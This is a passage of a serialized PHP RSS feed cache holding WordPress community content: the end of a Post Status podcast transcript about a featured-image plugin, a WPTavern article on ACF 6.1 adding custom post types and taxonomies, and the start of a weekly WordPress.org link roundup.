same way that Facebook a while ago introduced their open<br />graph. So you come here and you plug in post status and you say preview card. Card preview<br />has moved to tweet composer . Okay. Uh, but we can do tweet card preview banner bear.<br />So if I [01:22:00] plug in post status, they built their own preview. There you go. So like, that&#8217;s<br />what it&#8217;s gonna look like on social.<br />And these are the tools, you know, that are becoming more and more prevalent. And it&#8217;s like, so<br />in Yeah, in Yost, using them as an example, and I think the other SEO plugins have this too, is<br />you, you know, you, you set your featured image and it will automatically suck in your featured<br />image as the OG image, but you can also set a different one.<br />And so you can go and, and so like, I actually wanted to do just what you said, um, previous and<br />go to their blog and pick a blog post. . And so like this is, uh, I&#8217;m breaking their site, [01:23:00]<br />so they&#8217;ve got an image in the background. This is text, you know, an H one or whatever. But,<br />um, you know, VVA is so phenomenal with social media and stuff like that, that I bet if I take this<br />U R L and I plug it in here and I hit enter that he&#8217;s created.<br />Yeah. See, so he&#8217;s created a custom image that is that same background image, but has his<br />little photo in it has a title, you know, and this is all one image that is been generated Canva,</p>\n\n\n\n<p>somewhere different from, you know, the, the title up here. Whereas this is all actually H T M L<br />element.<br />Yeah, food for thought and, and actually a conversation to take offline, um, is there are features<br />here that, um, [01:24:00] overlap with other stuff that I&#8217;ve been working on. And so maybe it&#8217;s,<br />maybe we wanna wrap it all in together, or maybe this is a different kind of like the, you know,<br />we keep talking around ai, but we&#8217;re just not, that&#8217;s not the product we&#8217;re building this year, let&#8217;s<br />say.<br />Unless it, it, it&#8217;s the on unless we get to the point where it&#8217;s the only thing we can build. Right.<br />Um, and so it&#8217;s, maybe it&#8217;s something like that or maybe it&#8217;s the direction that we we&#8217;re, we&#8217;re<br />talking about, I dunno. Mm-hmm.<br />Cory Miller: Yeah. Now you got my mind rolling.<br />Corey Maass: Yep. Um, I gotta get. Okay. I do think that we need bringing, bringing you way<br />back down . Um, I mean, and I&#8217;m not picking on you, both of us, like these are our<br />conversations, but [01:25:00] um, I think having you go through the plugin and just saying, look,<br />we need, this needs a little design or this needs some intro text, or what the heck is the word<br />preset mean?<br />Um, would take us pretty far. Cuz right now we do have a very developer friendly product. And<br />so me going in and just changing some labels and things, if that makes it 20% more usable,<br />which I think is true, um, then, then we&#8217;re gonna be better off. The other thing is the Readme<br />needs updating now because we have a block.<br />We have featured images, we have. Media library. We have some basic settings. Okay. So let&#8217;s,<br />you know, I, I, I think we&#8217;re having, in a good way, we&#8217;re having all of the different company<br />meetings in one . We&#8217;re having the executive level discussions, [01:26:00] which are arguably<br />way more fun, but we also need to be having the, you know, low level mm-hmm.<br />dev, you know, dev conversations to make sure that we keep moving, moving what we&#8217;ve got<br />forward, um, in a, in a practical sense. Mm-hmm. .<br />Cory Miller: Yep. Okay. Well I&#8217;ve got down here, review the plugin. I&#8217;ll do a video on that, walk<br />through several things and just note stuff.<br />Corey Maass: Hi puppy. Um, your background changed. How did I take this long to even<br />notice?<br />Cory Miller: Yeah, I know, right? I got the fancy new sleeper.<br />Corey Maass: So it&#8217;s so respectable now. Don&#8217;t go that far<br />Cory Miller: yet. . I do. I think, I think, I&#8217;ll tell you what, I need a big poster right over there. Yeah.<br />Um, yeah. Looking respectable, man. What can you say?<br />Corey Maass: I&#8217;m proud of you, buddy. Thank you, . [01:27:00]<br />Cory Miller: Um, and then I&#8217;ve got the read me file too.<br />Um, to go back to Yeah. And I<br />Corey Maass: think that for me, like we now have Yeah. Read, read Me as you, um, or us like<br />we, we did it together last time. We can do it again. Um, I, I guess what I&#8217;m envisioning right is<br />we&#8217;re, we&#8217;re pretty close to feature, complete, um, Or something that&#8217;s actually usable. Like I&#8217;m,<br />I&#8217;m on the verge of actually installing this on my client&#8217;s websites.<br />I&#8217;ve got it on some of my own cuz I&#8217;m willing to muddle through the things that were confusing<br />or, um, you know, or, or not clear or, um, that&#8217;s redundant, um, or not what I needed. Whereas<br />now I&#8217;m like, okay, my clients have to upload a 16.9 featured image every day and currently they<br />have to go use a separate tool.<br />I&#8217;m ready to install this [01:28:00] plugin cuz it actually does what I need. Um, and so I wanna<br />make sure that we are. Product complete. So Dev builds the features and then we as a team<br />have complete the product. And then frankly, we can sit on it for a long time and keep having<br />more of these conversations or ex, you know, start from there.<br />It&#8217;s like we&#8217;ve built the dock out into the lake and so then we can start dipping our toe in more,<br />but mm-hmm. , we&#8217;re, you know, we&#8217;re out there, we&#8217;re in the world. Um, and, and people, other<br />people can use the dock too. I feel like right now we&#8217;ve got the, uh, the, the janky, uh, we&#8217;re, it&#8217;s<br />a, it&#8217;s a wooden pallet floating on empty beer cans.<br />And so we wouldn&#8217;t allow our loved ones to go use it to get out into the lake. Yes, I&#8217;m running<br />with this metaphor. You know, we&#8217;re close to having actually swimming built a reasonable dock.<br />Um, you know, that&#8217;s safe enough for our, for children to [01:29:00] use that kind of thing.<br />Cory Miller: You&#8217;re swimming with that metaphor.</p>\n\n\n\n<p>Sta. All right. Thanks man. Um, okay. Yeah, I&#8217;ve got my team marching items. Thanks for<br />keeping us grounded. Let me, uh, float in the atmosphere a little bit. I, it really is for specific<br />reasons cause I know when we go Got it. You know, like right there and, and some of that&#8217;s<br />validation, but just a little bit more clarity on how, who is gonna value this and is it the right thing<br />for what they need.<br />Um, but Okay. Thanks dude. Thanks for jumping on today. All right.</p>\n\n\n\n<h2 class=\"wp-block-heading\"><br /></h2>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 06 Apr 2023 13:22:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Cory Miller\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: ACF 6.1 Adds Support for Registering Custom Post Types and Taxonomies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143319\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://wptavern.com/acf-6-1-adds-support-for-registering-custom-post-types-and-taxonomies\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3772:\"<p>ACF (Advanced Custom Fields) <a href=\"https://www.advancedcustomfields.com/blog/acf-6-1-0-released/\">version 6.1</a> was released this week with support for creating Custom Post Types and Taxonomies. This is a long-awaited feature that users have been asking for since the earliest days of the plugin when it was still developed by its original author, Elliot Condon. </p>\n\n\n\n<p>When Delicious Brains acquired the plugin, the ACF community reiterated this feature request. WP Engine kept it on the roadmap when they <a href=\"https://wptavern.com/wp-engine-acquires-5-plugins-from-delicious-brains\">acquired ACF in June 2022</a> and has finally been able to deliver. Registering post types and taxonomies is now available through a simple interface that works in a similar way to creating field groups and fields.</p>\n\n\n\n<img />\n\n\n\n<p>After registering the CPT, users can then add an existing or new field group for it or create a taxonomy, and move on from there. The advantage is that users don&#8217;t have to break their workflows and use a different plugin for this functionality. For those managing client websites, it is one fewer plugin required. </p>\n\n\n\n<p>&#8220;We know there are a large number of ACF users registering custom post types (CPTs) and creating custom fields for them,&#8221; WP Engine Senior Product Manager Iain Poulson said. &#8220;But they have to register the CPTs either manually with code or using another plugin. The overarching workflow of modeling the data needed for a site build is fragmented between different plugins, UIs, and user experiences. We wanted to fix that!&#8221;</p>\n\n\n\n<p>The ACF development team has also created a <a href=\"https://www.advancedcustomfields.com/resources/post-types-and-taxonomies/#disabling-cpts-taxonomies\">dedicated import tool</a> for users who want to migrate post types and taxonomies from the <a href=\"https://wordpress.org/plugins/custom-post-type-ui/\">Custom Post Type UI</a> (CPTUI) plugin to ACF in order to manage them all from one plugin.  ACF has also built in the ability to <a href=\"https://www.advancedcustomfields.com/resources/acf-settings-enable_post_types/\">disable post types and taxonomies from the plugin admin</a> in case users do not require this feature in the update.</p>\n\n\n\n<p>ACF reports more than 4.5 million users, so it will be interesting to see how having this built in will impact the CPTUI user base, which is active on more than a million websites. Some users simply need custom post types but won&#8217;t require all of ACF&#8217;s capabilities, but there is certainly a large overlap between the two plugins.</p>\n\n\n\n<p>After expanding well beyond the creation of custom fields with this and previous updates, Poulson said they will be referring to the plugin as &#8220;ACF&#8221; more going forward. The plugin&#8217;s admin sidebar menu has been updated from &#8220;Custom Fields&#8221; to ACF.</p>\n\n\n\n<p>Version 6.1 also includes the following highlights and important changes:</p>\n\n\n\n<ul>\n<li>New &#8216;browse fields&#8217; button opens a modal to search and showcase all field types</li>\n\n\n\n<li>Post Object, Page Link and Relationship fields now support filtering by post status</li>\n\n\n\n<li> Full compatibility with PHP versions 8.1 and 8.2</li>\n\n\n\n<li>New option to filter field settings tabs so other plugins can add custom tabs and arrange their fields</li>\n\n\n\n<li>Security fix backported to ACF 5.12.5 for a security issue where ACF might unserialize maliciously manipulated data which instantiates a class</li>\n</ul>\n\n\n\n<p>All of these new features are available in both the free version and ACF Pro. Check out the <a href=\"https://www.advancedcustomfields.com/changelog/\">changelog</a> for the full rundown of everything included in version 6.1.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Apr 2023 21:21:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Post Status: Build a Block Theme • Theme Performance Improvements * Interactivity API • Why Jazz?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=148717\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://poststatus.com/build-a-block-theme-theme-performance-improvements-interactivity-api-why-jazz/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:19892:\"<h2 class=\"wp-block-heading\" id=\"h-this-week-at-wordpress-org-april-3-2023\">This Week at WordPress.org (April 3, 2023)</h2>\n\n\n<div class=\"has-background has-theme-palette-8-background-color wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Matt shares why WordPress releases are named after jazz musicians. The FSE block theme explores functionality gaps and gathers feedback on the Site Editor experience. WordPress 6.2 improves load times and server-side performance for block and classic themes. The Interactivity API proposal standardizes frontend interactivity for Gutenberg blocks. </p></div>\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<div class=\"wp-block-kadence-infobox kt-info-box_94d1bd-77\"><div class=\"kt-blocks-info-box-link-wrap kt-blocks-info-box-media-align-left kt-info-halign-left\"><div class=\"kt-blocks-info-box-media-container\"><div class=\"kt-blocks-info-box-media kt-info-media-animate-none\"><div class=\"kadence-info-box-icon-container kt-info-icon-animate-none\"><div class=\"kadence-info-box-icon-inner-container\"><span class=\"kb-svg-icon-wrap kb-svg-icon-fas_paint-brush kt-info-svg-icon\"></span></div></div></div></div><div class=\"kt-infobox-textcontent\"><h2 class=\"kt-blocks-info-box-title\">Build a Theme, Time to First Byte, Jazz, and Interactivity API</h2><p class=\"kt-blocks-info-box-text\"><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f9b8-1f3fb-200d-2640-fe0f.png\" alt=\"🦸🏻‍♀️\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">Preparing for the Next Women &amp; Nonbinary Release Squad</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f477-1f3fe.png\" alt=\"👷🏾\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">FSE Program Exploration: Build a block theme</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f680.png\" alt=\"🚀\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/04/05/wordpress-6-2-performance-improvements-for-all-themes/\">WordPress 6.2 Performance improvements for all themes</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f3b7.png\" alt=\"🎷\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/design/2023/03/30/why-jazz/\">Why Jazz?</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f7e6.png\" alt=\"🟦\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a><br /><br /><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f469-1f3fb-200d-1f4bb.png\" alt=\"👩🏻‍💻\" class=\"wp-smiley\" /> <a href=\"https://make.wordpress.org/cli/2023/04/05/wp-cli-v2-8-0-release-date/\">WP-CLI v2.8.0 release date</a></p></div></div></div>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_b57166-6e\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-news\"><a href=\"https://wordpress.org/news\">News</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://wordpress.org/news/2023/04/the-month-in-wordpress-march-2023/\">The Month in WordPress – March 2023</a></li>\n</ul>\n\n\n\n<div class=\"wp-block-kadence-spacer aligncenter kt-block-spacer-_8f6276-eb\"><div class=\"kt-block-spacer kt-block-spacer-halign-center\"><hr class=\"kt-divider\" /></div></div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-8\">\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-accessibility\"><a href=\"https://make.wordpress.org/accessibility\">Accessibility</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/accessibility/2023/04/05/accessibility-team-meeting-agenda-april-7-2023/\">Accessibility Team Meeting Agenda: April 7, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-central\"><a href=\"https://wordcamp.central.org\">Central</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://central.wordcamp.org/news/2023/03/wordcamp-buffalo-2023/\">WordCamp Buffalo 2023</a></li>\n\n\n\n<li><a href=\"https://central.wordcamp.org/news/2023/03/wordcamp-entebbe-2023-an-amazing-recap/\">WordCamp Entebbe 2023: An Amazing Recap</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-community\"><a href=\"https://make.wordpress.org/community\">Community</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/community/2023/04/07/its-time-to-plan-your-wp20-anniversary-celebration/\">It’s Time to Plan Your WP20 Anniversary Celebration!!</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/community/2023/04/06/personalised-coupon-codes-for-wordcamps/\">Personalised Coupon Codes for WordCamps</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/community/2023/04/03/community-team-training-7-community-team-roles-overview-discussion/\">Community Team Training #7: Community Team Roles Overview &amp; Discussion</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/community/2023/04/01/wordcamp-mentors-april-check-in/\">WordCamp Mentors’ April check-in!</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-core\"><a href=\"https://make.wordpress.org/core\">Core</a> </h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/07/preparing-for-the-next-women-nonbinary-release-squad/\">Preparing for the Next Women &amp; Nonbinary Release Squad</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/whats-new-in-gutenberg-15-5-05-april/\">What’s new in Gutenberg 15.5? (05 April)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/wordpress-6-2-performance-improvements-for-all-themes/\">WordPress 6.2 Performance improvements for all themes</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/04/a-week-in-core-april-3-2023/\">Two Weeks in Core – April 3, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/03/preferred-languages-help-test-the-latest-version/\">Preferred Languages: Help test the latest version</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/\">Proposal: The Interactivity API – A better developer experience in building interactive blocks</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-meetings\">Meetings</h3>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/04/editor-chat-agenda-april-5th-2023/\">Editor Chat Agenda: April 5th, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2023/04/06/dev-chat-summary-april-5-2023/\">Dev Chat Summary, April 5, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-design\"><a href=\"https://make.wordpress.org/design\">Design</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/design/2023/03/30/why-jazz/\">Why Jazz?</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-docs\"><a href=\"https://make.wordpress.org/docs\">Docs</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/docs/2023/03/26/agenda-for-docs-team-bi-weekly-meeting-april-4-2023/\">Agenda for Docs Team bi-weekly meeting April 4, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/03/documentation-team-update-april-3-2023/\">Documentation Team Update – April 3, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-hosting\"><a href=\"https://make.wordpress.org/hosting\">Hosting</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/hosting/2023/04/05/hosting-team-meeting-agenda-2023-04-05/\">Hosting Team meeting agenda 2023-04-05</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-marketing\"><a href=\"https://make.wordpress.org/marketing\">Marketing</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/marketing/2023/04/04/notes-global-marketing-team-meeting-28-march-2023/\">Notes: Global Marketing Team meeting, 28 March 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-meta\"><a href=\"https://make.wordpress.org/meta\">Meta</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/meta/2023/04/06/matrix-chat-summary-april-6-2023/\">Matrix chat Summary, April 6, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/meta/2023/04/04/agenda-biweekly-matrix-chat-thu-april-6-2023-10am-utc/\">Agenda: Biweekly Matrix Chat – Thu, April 6, 2023 (10AM UTC)</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-mobile\"><a href=\"https://make.wordpress.org/mobile\">Mobile</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/updates/2023/04/07/mobile-team-update-april-6th-2/\">Mobile Team Update – April 6th</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-openverse\"><a href=\"https://make.wordpress.org/openverse\">Openverse</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/openverse/2023/04/05/community-meeting-recap-2023-04-04/\">Community Meeting Recap (2023-04-04)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/openverse/2023/04/03/last-week-openverse-2023-03-27-2023-04-03/\">A week in Openverse: 2023-03-27 – 2023-04-03</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/openverse/2023/03/30/community-meeting-recap-28-march-2023/\">Community Meeting Recap (28 March 2023)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/openverse/2023/03/29/openverse-monthly-priorities-meeting-2023-04-05/\">Openverse Monthly Priorities Meeting 2023-04-05</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-performance\"><a href=\"https://make.wordpress.org/performance/\">Performance</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2023/04/05/performance-chat-summary-04-april-2023/\">Performance Chat Summary: 4 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-plugins\"><a href=\"https://make.wordpress.org/plugins\">Plugins</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/21/use-of-code-generators-must-remain-gpl-compatible/\">Use of Code Generators Must Remain GPL Compatible</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/plugins/2023/03/10/advance-notice-of-retirement/\">Advance Notice of Retirement</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/04/plugin-review-team-3-april-2023/\">Plugin Review Team – 3 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-polyglots\"><a href=\"https://make.wordpress.org/polyglots\">Polyglots</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/polyglots/2023/04/05/agenda-weekly-polyglots-chat-april-05-2023-0700-utc/\">Agenda: Weekly Polyglots Chat – April 05, 2023 (07:00 UTC)</a></li>\n</ul>\n</div>\n\n\n\n<div class=\"wp-block-column is-layout-flow\">\n<h2 class=\"wp-block-heading\" id=\"h-project\">Project</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/project/2023/02/06/proposal-creating-a-wordpress-contributor-mentorship-program/\">Proposal: Creating a WordPress Contributor Mentorship Program</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/project/2023/01/27/discussion-ending-the-eternal-september/\">Discussion: Ending the Eternal September</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-support\"><a href=\"https://make.wordpress.org/support\">Support</a></h2>\n\n\n\n<ul>\n<li> <a href=\"https://make.wordpress.org/support/2023/03/support-ticket-triage-session-april-5th-2023-at-1600-utc/\">Support ticket triage session – April 5th 2023 at 16:00 UTC&nbsp;</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-test\"><a href=\"https://make.wordpress.org/test\">Test</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/test/2023/04/04/hallway-hangout-lets-chat-about-moving-to-the-site-editor/\">Hallway Hangout: Let’s chat about Moving to the Site Editor</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/test/2023/03/29/fse-program-exploration-build-a-block-theme/\">FSE Program Exploration: Build a block theme</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/03/test-team-update-3-april-2023/\">Test Team Update: 3 April 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-theme\">Theme</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/themes/2023/04/04/theme-handbook-overhaul-proposal/\">Theme Handbook Overhaul Proposal</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/04/themes-team-update-april-04-2023/\">Themes team update April 04, 2023</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-training\"><a href=\"https://make.wordpress.org/training\">Training</a></h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/training/2023/04/07/next-steps-for-the-faculty-program/\">Next Steps for the Faculty Program</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/learn-wordpress-april-2023-newsletter/\">Learn WordPress April 2023 Newsletter</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/training/2023/04/05/proposal-creating-learning-pathways-for-learn-wordpress/\">Proposal: Creating Learning Pathways for Learn WordPress</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/training/2023/03/29/introduction-to-wordpress-development-syllabus/\">Introduction to WordPress Development syllabus</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/training/2023/04/03/meeting-agenda-for-april-04-2023/\">Meeting agenda for April 04, 2023</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/updates/2023/04/01/whats-new-on-learn-wordpress-in-march-2023/\">What’s new on Learn WordPress in March 2023</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-lesson-plans\"><a href=\"https://learn.wordpress.org/lesson-plans\">Lesson Plans</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/lesson-plan/ar-dashboard-overview/\">نبذة عن لوحة البيانات </a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-tutorials\"><a href=\"https://learn.wordpress.org/tutorials\">Tutorials</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/tutorial/using-block-patterns/\">Using Block Patterns</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/tutorial/add-media-and-openverse-images-to-your-content-directly-from-the-inserter/\">Add media and Openverse images to your content directly from the Inserter</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/tutorial/wordpress-rest-api-custom-routes-endpoints/\">WordPress REST API – custom routes &amp; endpoints</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/tutorial/intro-to-the-site-editor-and-template-editor/\">Intro to the Site Editor and Template Editor</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/tutorial/how-to-use-the-wordpress-stylebook-with-your-block-theme/\">How to use the WordPress Stylebook with your block theme</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-online-workshops\">Online Workshops</h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/?meeting=how-to-validate-content-feedback-for-the-wordpress-training-team\">How to validate content feedback for the WordPress Training Team</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=33114\">WordPress 6.2 のアップデート内容を見てみよう！</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=wordpress-6-2-%E3%81%AE%E3%82%A2%E3%83%83%E3%83%97%E3%83%87%E3%83%BC%E3%83%88%E5%86%85%E5%AE%B9%E3%82%92%E8%A6%8B%E3%81%A6%E3%81%BF%E3%82%88%E3%81%86%EF%BC%81\">WordPress 6.2 のアップデート内容を見てみよう！</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=updating-a-blogs-design-informal-live-stream-part-4\">Updating a blog’s design (Informal live stream) – Part 4</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=the-wordpress-request-lifecycle-2\">WP dev livestream: WordPress request lifecycle</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=the-wordpress-request-lifecycle\">The WordPress request lifecycle</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=a-guide-to-open-source-and-wordpress-timezone-2\">A Guide to Open Source and WordPress (Timezone 2)</a></li>\n\n\n\n<li><a href=\"https://learn.wordpress.org/?meeting=a-guide-to-open-source-and-wordpress\">A Guide to Open Source and WordPress</a></li>\n</ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"h-courses\"><a href=\"https://learn.wordpress.org/courses\">Courses</a></h3>\n\n\n\n<ul>\n<li><a href=\"https://learn.wordpress.org/course/converting-a-shortcode-to-a-block/\">Converting a Shortcode to a Block</a></li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" 